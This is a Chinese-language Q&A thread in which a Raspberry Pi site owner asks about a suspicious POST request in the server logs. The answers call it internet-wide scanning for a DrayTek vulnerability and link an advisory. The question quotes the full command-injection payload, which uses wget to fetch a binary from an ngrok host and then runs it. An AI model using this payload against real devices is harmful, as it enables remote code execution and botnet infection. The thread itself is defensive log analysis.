你能确认这个奇怪的帖子请求是一种网络攻击吗？

Question

我已经打开了一个网站，它的目的只是分享文本信息。没有后端的数据库，或者不知道​​身份验证。然而，当我查看日志时，我注意到了这个请求：

POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a

它已经发生了两次，我的服务器每次都会响应404响应。但现在我有点担心了。我的网站在连接到ISP设备的覆盆子上运行。即使我的服务器没有任何sudo权限，我也想知道它们是否有任何风险？

还有，谁能给我解释一下这些可疑的条目是什么意思。可能的风险是什么？最后，当你在任何设备(树莓)和互联网之间建立管道时，你能和我分享一些技巧/良好的行为吗？

Answer 1

不需要担心。这是一种攻击，但不是针对您的特定站点，而是在互联网的大部分区域扫描特定的漏洞。您的服务器以404响应的事实意味着它不包含易受攻击的页面。

这将发生在任何暴露在公共互联网上的网站上，并被认为是背景噪音的一部分。

Answer 2

我也注意到我的web服务器上也有同样的请求。以下是有关此次攻击的更多信息：https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-draytek-products-could-allow-for-arbitrary-code-execution_2020-043/